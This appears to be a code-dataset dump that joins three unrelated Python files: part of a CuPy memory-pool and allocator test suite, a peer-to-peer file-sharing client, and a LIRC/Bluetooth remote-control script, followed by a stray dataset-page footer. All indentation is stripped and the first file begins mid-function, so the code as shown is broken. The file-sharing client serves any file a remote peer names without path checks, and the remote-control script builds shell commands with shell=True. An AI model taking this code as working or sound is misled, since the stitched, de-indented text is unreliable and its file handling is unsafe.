assert isinstance(mem, memory.BaseMemory)
assert isinstance(mem, memory.PooledMemory)
assert self.pool.n_free_blocks() == 0
mem.free()
assert self.pool.n_free_blocks() == 1
with testing.assert_warns(DeprecationWarning):
self.pool.free_all_free()
assert self.pool.n_free_blocks() == 0
def test_free_all_free_without_malloc(self):
with cupy.cuda.Device():
# call directly without malloc.
with testing.assert_warns(DeprecationWarning):
self.pool.free_all_free()
assert self.pool.n_free_blocks() == 0
def test_n_free_blocks_without_malloc(self):
with cupy.cuda.Device():
# call directly without malloc/free_all_free.
assert self.pool.n_free_blocks() == 0
def test_used_bytes(self):
with cupy.cuda.Device():
assert 0 == self.pool.used_bytes()
def test_free_bytes(self):
with cupy.cuda.Device():
assert 0 == self.pool.free_bytes()
def test_total_bytes(self):
with cupy.cuda.Device():
assert 0 == self.pool.total_bytes()
# TODO(leofang): test MemoryAsyncPool. We currently remove the test because
# this test class requires the ability of creating a new pool, which we do
# not support yet for MemoryAsyncPool.
@testing.parameterize(*testing.product({
'mempool': ('MemoryPool',),
}))
@testing.gpu
class TestAllocator(unittest.TestCase):
def setUp(self):
if self.mempool == 'MemoryAsyncPool':
if cupy.cuda.runtime.is_hip:
pytest.skip('HIP does not support async allocator')
if cupy.cuda.driver.get_build_version() < 11020:
pytest.skip('malloc_async is supported since CUDA 11.2')
if cupy.cuda.runtime.driverGetVersion() < 11030:
pytest.skip('pool statistics is supported with driver 11.3+')
self.old_pool = cupy.get_default_memory_pool()
self.pool = getattr(memory, self.mempool)()
memory.set_allocator(self.pool.malloc)
def tearDown(self):
self.pool.set_limit(size=0)
self.pool.free_all_blocks()
memory.set_allocator(self.old_pool.malloc)
def test_set_allocator(self):
with cupy.cuda.Device():
assert 0 == self.pool.used_bytes()
arr = cupy.arange(128, dtype=cupy.int64)
assert 1024 == arr.data.mem.size
assert 1024 == self.pool.used_bytes()
def test_get_allocator(self):
assert memory.get_allocator() == self.pool.malloc
def test_allocator_context_manager(self):
new_pool = memory.MemoryPool()
with cupy.cuda.using_allocator(new_pool.malloc):
assert memory.get_allocator() == new_pool.malloc
assert memory.get_allocator() == self.pool.malloc
def test_set_allocator_cm(self):
new_pool = memory.MemoryPool()
new_pool2 = memory.MemoryPool()
with cupy.cuda.using_allocator(new_pool.malloc):
with self.assertRaises(ValueError):
memory.set_allocator(new_pool2.malloc)
def test_allocator_nested_context_manager(self):
new_pool = memory.MemoryPool()
with cupy.cuda.using_allocator(new_pool.malloc):
new_pool2 = memory.MemoryPool()
assert memory.get_allocator() == new_pool.malloc
with cupy.cuda.using_allocator(new_pool2.malloc):
assert memory.get_allocator() == new_pool2.malloc
assert memory.get_allocator() == new_pool.malloc
assert memory.get_allocator() == self.pool.malloc
def test_allocator_thread_local(self):
barrier = threading.Barrier(2)
def thread_body(self):
cupy.cuda.Device().use()
new_pool = memory.MemoryPool()
with cupy.cuda.using_allocator(new_pool.malloc):
assert memory.get_allocator() == new_pool.malloc
barrier.wait()
arr = cupy.zeros(128, dtype=cupy.int64)
barrier.wait()
assert arr.data.mem.size == new_pool.used_bytes()
barrier.wait()
assert memory.get_allocator() == self.pool.malloc
self._success = True
with cupy.cuda.Device():
self._success = False
t = threading.Thread(target=thread_body, args=(self,), daemon=True)
t.start()
barrier.wait()
assert memory.get_allocator() == self.pool.malloc
arr = cupy.ones(256, dtype=cupy.int64)
barrier.wait()
assert arr.data.mem.size == self.pool.used_bytes()
barrier.wait()
t.join()
assert self._success
def test_thread_local_valid(self):
new_pool = memory.MemoryPool()
arr = None
with cupy.cuda.using_allocator(new_pool.malloc):
arr = cupy.zeros(128, dtype=cupy.int64)
arr += 1
# Check that arr and the pool have not ben released
assert arr.data.mem.size == new_pool.used_bytes()
assert arr.sum() == 128
def _reuse_between_thread(self, stream_main, stream_sub):
new_pool = memory.MemoryPool()
def job(stream):
cupy.cuda.Device().use()
with cupy.cuda.using_allocator(new_pool.malloc):
with stream:
arr = cupy.arange(16)
self._ptr = arr.data.ptr
del arr
self._error = False
# Run in main thread.
self._ptr = -1
self._error = True
job(stream_main)
assert not self._error
main_ptr = self._ptr
# Run in sub thread.
self._ptr = -1
self._error = True
with cupy.cuda.Device():
t = threading.Thread(target=job, args=(stream_sub,))
t.daemon = True
t.start()
t.join()
assert not self._error
return main_ptr, self._ptr
def test_reuse_between_thread(self):
stream = cupy.cuda.Stream.null
main_ptr, sub_ptr = self._reuse_between_thread(stream, stream)
assert main_ptr == sub_ptr
def test_reuse_between_thread_same_stream(self):
stream = cupy.cuda.Stream()
main_ptr, sub_ptr = self._reuse_between_thread(stream, stream)
assert main_ptr == sub_ptr
def test_reuse_between_thread_different_stream(self):
stream1 = cupy.cuda.Stream()
stream2 = cupy.cuda.Stream()
main_ptr, sub_ptr = self._reuse_between_thread(stream1, stream2)
assert main_ptr != sub_ptr
@pytest.mark.skipif(cupy.cuda.runtime.is_hip, reason='No PTDS on HIP')
def test_reuse_between_thread_ptds(self):
stream = cupy.cuda.Stream.ptds
main_ptr, sub_ptr = self._reuse_between_thread(stream, stream)
assert main_ptr != sub_ptr
@testing.gpu
class TestAllocatorDisabled(unittest.TestCase):
def setUp(self):
self.pool = cupy.get_default_memory_pool()
def tearDown(self):
memory.set_allocator(self.pool.malloc)
def _check_pool_not_used(self):
used_bytes = self.pool.used_bytes()
with cupy.cuda.Device():
arr = cupy.arange(128, dtype=cupy.int64)
assert 0 == self.pool.used_bytes() - used_bytes
del arr
def test(self):
memory.set_allocator()
self._check_pool_not_used()
def test_none(self):
memory.set_allocator(None)
self._check_pool_not_used()
class PythonAllocator(object):
def __init__(self):
self.malloc_called = False
self.free_called = False
def malloc(self, size, device_id):
self.malloc_called = True
return cupy.cuda.runtime.malloc(size)
def free(self, size, device_id):
self.free_called = True
cupy.cuda.runtime.free(size)
@testing.gpu
class TestPythonFunctionAllocator(unittest.TestCase):
def setUp(self):
self.old_pool = cupy.get_default_memory_pool()
self.alloc = PythonAllocator()
python_alloc = memory.PythonFunctionAllocator(
self.alloc.malloc, self.alloc.free)
memory.set_allocator(python_alloc.malloc)
def tearDown(self):
memory.set_allocator(self.old_pool.malloc)
def test_allocator(self):
assert not self.alloc.malloc_called and not self.alloc.free_called
cupy.zeros(10)
assert self.alloc.malloc_called and self.alloc.free_called
@testing.gpu
class TestMemInfo(unittest.TestCase):
def test_mem_info(self):
d = cupy.cuda.Device()
mem_info = d.mem_info
assert isinstance(mem_info, tuple)
assert len(mem_info) == 2
assert all(isinstance(m, int) for m in mem_info)
assert all(m > 0 for m in mem_info)
@testing.gpu
class TestLockAndNoGc(unittest.TestCase):
def test(self):
lock = fastrlock.rlock.FastRLock()
ctx = memory.LockAndNoGc(lock)
assert gc.isenabled()
self.assertRaises(Exception, lock.release)
with ctx:
assert not gc.isenabled()
lock.release()
lock.acquire()
assert gc.isenabled()
self.assertRaises(Exception, lock.release)
class TestExceptionPicklable(unittest.TestCase):
def test(self):
e1 = memory.OutOfMemoryError(124, 1024, 1024)
e2 = pickle.loads(pickle.dumps(e1))
assert e1.args == e2.args
assert str(e1) == str(e2)
@testing.gpu
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason='HIP does not support async allocator')
@pytest.mark.skipif(cupy.cuda.driver.get_build_version() < 11020,
reason='malloc_async is supported since CUDA 11.2')
class TestMallocAsync(unittest.TestCase):
def setUp(self):
self.old_pool = cupy.get_default_memory_pool()
memory.set_allocator(memory.malloc_async)
def tearDown(self):
memory.set_allocator(self.old_pool.malloc)
def _check_pool_not_used(self):
used_bytes = self.old_pool.used_bytes()
with cupy.cuda.Device():
arr = cupy.arange(128, dtype=cupy.int64)
assert 0 == self.old_pool.used_bytes() - used_bytes
del arr
def test(self):
self._check_pool_not_used()
def test_stream1(self):
# Check: pool is not used when on a stream
s = cupy.cuda.Stream()
with s:
self._check_pool_not_used()
def test_stream2(self):
# Check: the memory was allocated on the right stream
s = cupy.cuda.Stream()
with s:
memptr = memory.alloc(100)
assert memptr.mem.stream_ref().ptr == s.ptr
def test_stream3(self):
# Check: destory stream does not affect memory deallocation
s = cupy.cuda.Stream()
with s:
memptr = memory.alloc(100)
del s
gc.collect()
del memptr
def test_stream4(self):
# Check: free on the same stream
s = cupy.cuda.Stream()
with s:
memptr = memory.alloc(100)
del memptr
def test_stream5(self):
# Check: free on another stream
s1 = cupy.cuda.Stream()
with s1:
memptr = memory.alloc(100)
del s1
s2 = cupy.cuda.Stream()
with s2:
del memptr
@testing.gpu
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason='HIP does not support async allocator')
@pytest.mark.skipif(cupy.cuda.driver.get_build_version() < 11020,
reason='malloc_async is supported since CUDA 11.2')
class TestMemoryAsyncPool(unittest.TestCase):
def setUp(self):
self.pool = memory.MemoryAsyncPool()
self.unit = memory._allocation_unit_size
self.stream = stream_module.Stream()
self.stream_ident = self.stream.ptr
cupy.get_default_memory_pool().free_all_blocks()
cupy.cuda.Device().synchronize()
def tearDown(self):
self.pool.set_limit(size=0)
self.pool.free_all_blocks()
def test_zero_size_alloc(self):
with cupy.cuda.Device():
mem = self.pool.malloc(0).mem
assert isinstance(mem, memory.MemoryAsync)
assert not isinstance(mem, memory.PooledMemory)
def test_alloc(self):
with cupy.cuda.Device():
mem = self.pool.malloc(100).mem
assert isinstance(mem, memory.MemoryAsync)
assert not isinstance(mem, memory.PooledMemory)
@testing.slow
def test_alloc_large_chunk(self):
self.pool.free_all_blocks()
with cupy.cuda.Device() as d:
_, mem_total = d.mem_info
mem = self.pool.malloc(int(0.7 * mem_total)).mem # 70% memory
del mem
mem = self.pool.malloc(int(0.3 * mem_total)).mem # 30% memory # noqa
def test_free_all_blocks(self):
with cupy.cuda.Device():
mem = self.pool.malloc(1).mem
del mem
self.pool.free_all_blocks()
@testing.slow
def test_free_all_blocks_large_chunk(self):
# When memory is returned to the async mempool, it is not immediately
# visible to normal malloc routines until after a sync happens.
default_pool = cupy.get_default_memory_pool()
with cupy.cuda.Device() as d:
_, mem_total = d.mem_info
mem = self.pool.malloc(int(0.7 * mem_total)).mem # 70% memory
del mem
with pytest.raises(memory.OutOfMemoryError):
default_pool.malloc(int(0.3 * mem_total)) # 30% memory
self.pool.free_all_blocks() # synchronize
default_pool.malloc(int(0.3 * mem_total)) # this time it'd work
@testing.slow
def test_interaction_with_CuPy_default_pool(self):
# Test saneness of cudaMallocAsync
default_pool = cupy.get_default_memory_pool()
with cupy.cuda.Device() as d:
_, mem_total = d.mem_info
mem = default_pool.malloc(int(0.7 * mem_total)).mem # 70% memory
del mem
with pytest.raises(memory.OutOfMemoryError):
self.pool.malloc(int(0.3 * mem_total)) # 30% memory
default_pool.free_all_blocks()
self.pool.malloc(int(0.3 * mem_total)) # this time it'd work
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='used_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_used_bytes(self):
with cupy.cuda.Device():
assert 0 == self.pool.used_bytes()
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='used_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_used_bytes2(self):
p1 = self.pool.malloc(self.unit * 2)
assert self.unit * 2 == self.pool.used_bytes()
p2 = self.pool.malloc(self.unit * 4)
assert self.unit * 6 == self.pool.used_bytes()
del p2
assert self.unit * 2 == self.pool.used_bytes()
del p1
assert self.unit * 0 == self.pool.used_bytes()
p3 = self.pool.malloc(self.unit * 1)
assert self.unit * 1 == self.pool.used_bytes()
del p3
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='used_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_used_bytes_stream(self):
p1 = self.pool.malloc(self.unit * 4)
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
assert self.unit * 2 == self.pool.used_bytes()
del p2
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='free_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_free_bytes(self):
with cupy.cuda.Device():
assert 0 == self.pool.free_bytes()
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='free_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_free_bytes2(self):
# Note: MemoryAsyncPool works differently from MemoryPool. The first
# allocation would be much bigger than requested, and the pool size
# increases as needed. As a result, this test method is very different
# from TestSingleDeviceMemoryPool.test_free_bytes(), in that the pool
# size is a fixed value (outside of our control).
p1 = self.pool.malloc(self.unit * 2)
assert self.pool.free_bytes() == (
self.pool.total_bytes() - self.pool.used_bytes()) # always true
# current_size is fixed throughout this test, as no synchronization
# (such as free_all_blocks()) is done
current_size = self.pool.total_bytes()
free_size = self.pool.free_bytes()
p2 = self.pool.malloc(self.unit * 4)
free_size -= self.unit * 4
assert self.pool.free_bytes() == free_size
del p2
free_size += self.unit * 4
assert self.pool.free_bytes() == free_size
del p1
free_size += self.unit * 2
assert self.pool.free_bytes() == free_size
p3 = self.pool.malloc(self.unit * 1)
free_size -= self.unit * 1
assert self.pool.free_bytes() == free_size
del p3
assert self.pool.total_bytes() == current_size
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='free_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_free_bytes_stream(self):
p1 = self.pool.malloc(self.unit * 4)
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
assert self.pool.free_bytes() == (
self.pool.total_bytes() - self.pool.used_bytes()) # always true
del p2
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='total_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_total_bytes(self):
with cupy.cuda.Device():
assert 0 == self.pool.total_bytes()
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='total_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_total_bytes2(self):
# Note: MemoryAsyncPool works differently from MemoryPool. The first
# allocation would be much bigger than requested, and the pool size
# increases as needed. As a result, this test method is very different
# from TestSingleDeviceMemoryPool.test_total_bytes(), in that the pool
# size is either 0 or a fixed value (outside of our control).
p1 = self.pool.malloc(self.unit * 2)
current_size = self.pool.total_bytes()
assert current_size == self.pool.total_bytes()
p2 = self.pool.malloc(self.unit * 4)
assert current_size == self.pool.total_bytes()
del p1
assert current_size == self.pool.total_bytes()
del p2
assert current_size == self.pool.total_bytes()
self.pool.free_all_blocks()
assert 0 == self.pool.total_bytes()
p3 = self.pool.malloc(self.unit * 1)
assert current_size == self.pool.total_bytes()
assert (self.pool.used_bytes() + self.pool.free_bytes()
== self.pool.total_bytes())
del p3
self.pool.free_all_blocks()
assert 0 == self.pool.total_bytes()
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='total_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_total_bytes_stream(self):
# Note: MemoryAsyncPool works differently from MemoryPool. The first
# allocation would be much bigger than requested, and the pool size
# increases as needed. As a result, this test method is very different
# from TestSingleDeviceMemoryPool.test_total_bytes_stream(), in that
# the pool size is either 0 or a fixed value (outside of our control).
p1 = self.pool.malloc(self.unit * 4)
current_size = self.pool.total_bytes()
assert current_size > 0
del p1
assert current_size > 0
self.pool.free_all_blocks()
assert 0 == self.pool.total_bytes()
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
assert current_size == self.pool.total_bytes()
del p2
def test_get_limit(self):
# limit is disabled by default
assert 2**64-1 == self.pool.get_limit()
def test_set_limit_size(self):
self.pool.set_limit(size=1024)
assert 1024 == self.pool.get_limit()
self.pool.set_limit(size=2**33)
assert 2**33 == self.pool.get_limit()
self.pool.set_limit(size=0)
assert 2**64-1 == self.pool.get_limit()
with self.assertRaises(ValueError):
self.pool.set_limit(size=-1)
def test_set_limit_fraction(self):
_, total = cupy.cuda.runtime.memGetInfo()
self.pool.set_limit(fraction=0)
assert 2**64-1 == self.pool.get_limit()
self.pool.set_limit(fraction=0.5)
assert total * 0.5 == self.pool.get_limit()
self.pool.set_limit(fraction=1.0)
assert total == self.pool.get_limit()
with self.assertRaises(ValueError):
self.pool.set_limit(fraction=-1)
with self.assertRaises(ValueError):
self.pool.set_limit(fraction=1.1)
|
peer.py
|
import os
import sys
import socket
import threading
import json
import time
import click
from watchdog.observers import Observer
from watchdog.events import PatternMatchingEventHandler
FORMAT = "utf-8"
SIZE = 1024
def watchFolder(conn):
# Keep watching the folder for any change
patterns = "*"
ignore_patterns = ""
ignore_directories = False
case_sensitive = True
event_handler = PatternMatchingEventHandler(patterns, ignore_patterns, ignore_directories, case_sensitive)
def on_change(event):
# Update the file list with the indexing server
files = os.listdir("./")
register_data = {
"action": "UPDATE",
"filelist": files
}
register_json = json.dumps(register_data)
conn.send(register_json.encode(FORMAT))
event_handler.on_created = on_change
event_handler.on_deleted = on_change
path = "."
go_recursively = True
folder_observer = Observer()
folder_observer.schedule(event_handler, path, recursive=go_recursively)
folder_observer.start()
def downloadFile(addr, filename):
# Download file from other peer
print(f"[DOWNLOADING] Downloading {filename} from {addr}")
downloader = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
downloader.connect(addr)
downloader.send(json.dumps({"file": filename}).encode(FORMAT))
l = downloader.recv(1024)
f = open(filename,'wb') #open in binary
while (l):
f.write(l)
l = downloader.recv(1024)
f.close()
downloader.close()
def uploadHandler(conn, addr):
full_addr = addr[0] + ":" + str(addr[1])
data = conn.recv(SIZE).decode(FORMAT)
json_data = json.loads(data)
filename = json_data["file"]
print(f"[UPLOADING] {full_addr} is downloading {filename}")
f = open (filename, "rb")
l = f.read(SIZE)
while (l):
conn.send(l)
l = f.read(SIZE)
conn.close()
def peerServer(peer_server_addr):
print("[STARTING] Peer Server is starting")
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(peer_server_addr)
server.listen()
print(f"[LISTENING] Peer Server is listening on {peer_server_addr[0]}:{str(peer_server_addr[1])}")
while True:
conn, addr = server.accept()
thread = threading.Thread(target=uploadHandler, args=(conn, addr))
thread.start()
def connectIndexingServer(client_bind_addr, server_addr):
conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn.bind(client_bind_addr)
try:
conn.connect(server_addr)
except:
print("[ERROR] Cannot connect to indexing server")
try:
sys.exit(0)
except SystemExit:
os._exit(0)
peer_server_addr = (client_bind_addr[0], client_bind_addr[1] + 1)
thread = threading.Thread(target=peerServer, args=(peer_server_addr,))
thread.daemon = True
thread.start()
files = os.listdir("./")
register_data = {
"action": "REGISTER",
"filelist": files
}
register_json = json.dumps(register_data)
conn.send(register_json.encode(FORMAT))
thread = threading.Thread(target=watchFolder, args=(conn,))
thread.daemon = True
thread.start()
isvalid = True
while True:
if isvalid:
data = conn.recv(SIZE).decode(FORMAT)
if not data:
print("[ERROR] Disconnect from indexing server")
break
json_data = json.loads(data)
if json_data["type"] == "OK":
print(json_data["msg"])
elif json_data["type"] == "QUERY-RES":
query_file = json_data["file"]
peer_list = json_data["msg"]
if len(peer_list) > 0:
while True:
for i, peer in enumerate(peer_list):
print(str(i+1) + ") " + peer)
print("0) exit")
print("Choose a peer to download:")
user_input = input("> ")
if user_input[0].isnumeric():
i = int(user_input[0])
if i == 0:
break
elif i > 0 and i <= len(peer_list):
peer_addr = peer_list[i-1].split(":")
download_addr = (peer_addr[0], int(peer_addr[1])+1)
downloadFile(download_addr, query_file)
break
else:
print("Wrong index please try again")
else:
print("Invalid input please try again")
else:
print("No peers found for the file.")
user_input = input("> ")
user_input = user_input.split(" ")
action = user_input[0]
isvalid = True
if action == "QUERY" and len(user_input) > 1:
conn.send(json.dumps({"action": "QUERY", "file": user_input[1]}).encode(FORMAT))
elif action == "WAIT":
print("Start waiting")
time.sleep(1)
isvalid = False
elif action == "EXIT":
break
else:
print("Input action is invalid!")
isvalid = False
print("Disconnected from the server.")
conn.close()
@click.command()
@click.argument('port')
@click.option('--dir',
default="./",
help='Serving directory relative to current directory')
@click.option('--server',
default="127.0.0.1:5000",
help='Indexing server address')
def main(port, dir, server):
target_dir = os.path.join(os.getcwd(), dir)
os.chdir(target_dir)
port = int(port)
localhost = socket.gethostbyname(socket.gethostname())
client_bind_addr = (localhost, port)
server_addr = server.split(":")
server_addr = (server_addr[0], int(server_addr[1]))
connectIndexingServer(client_bind_addr, server_addr)
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
try:
sys.exit(0)
except SystemExit:
os._exit(0)
|
control_lirc.py
|
import bluetooth
from control_artik import *
import logging
import socket
import string
import subprocess
import sys
import time
import threading
FORMAT = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
logging.basicConfig(format=FORMAT, level=logging.DEBUG)
class ControlLirc(object):
def __init__(self):
self.connected = False
self.sock = None
self.socket_path = "/var/run/lirc/lircd"
self.button_delay = 0.25
def close(self):
self.sock.close()
exit(self.sock)
exit()
def isConnected(self):
nearby_devices = bluetooth.discover_devices(duration=8, lookup_names=True, flush_cache=True)
for addr, name in nearby_devices:
output, error = subprocess.Popen("echo 'info %s\nquit' | bluetoothctl" % (addr), shell=True,
stdout=subprocess.PIPE).communicate()
if output.find("Connected: yes") == -1:
subprocess.call("echo 'connect %s\nquit' | bluetoothctl" % (addr), shell=True)
if not self.connected:
self.tryConnection()
threading.Thread(target=self.monitor).start()
return self.connected
def connectEventLircd(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.sock.connect(self.socket_path)
def tryConnection(self):
try:
self.connectEventLircd()
self.connected = True
logging.info("connected to Lirc-Socket on %s" % self.socket_path)
# self.monitor()
except socket.error as msg:
logging.error("connection error %s" % msg)
self.connected = False
def monitor(self):
while self.connected:
try:
buf = self.sock.recv(128)
if not buf:
self.sock.close()
except:
logging.error("monitoring error ", sys.exc_info()[0])
self.sock.close()
lines = string.split(buf, "\n")
for line in lines[:-1]:
code, count, cmd, device = string.split(line, " ")[:4]
if count == "0":
if cmd == "KEY_UP":
send_up()
time.sleep(self.button_delay)
elif cmd == "KEY_DOWN":
send_down()
time.sleep(self.button_delay)
elif cmd == "KEY_LEFT":
send_left()
time.sleep(self.button_delay)
elif cmd == "KEY_RIGHT":
send_right()
time.sleep(self.button_delay)
elif cmd == "KEY_HOME":
send_home()
time.sleep(self.button_delay)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.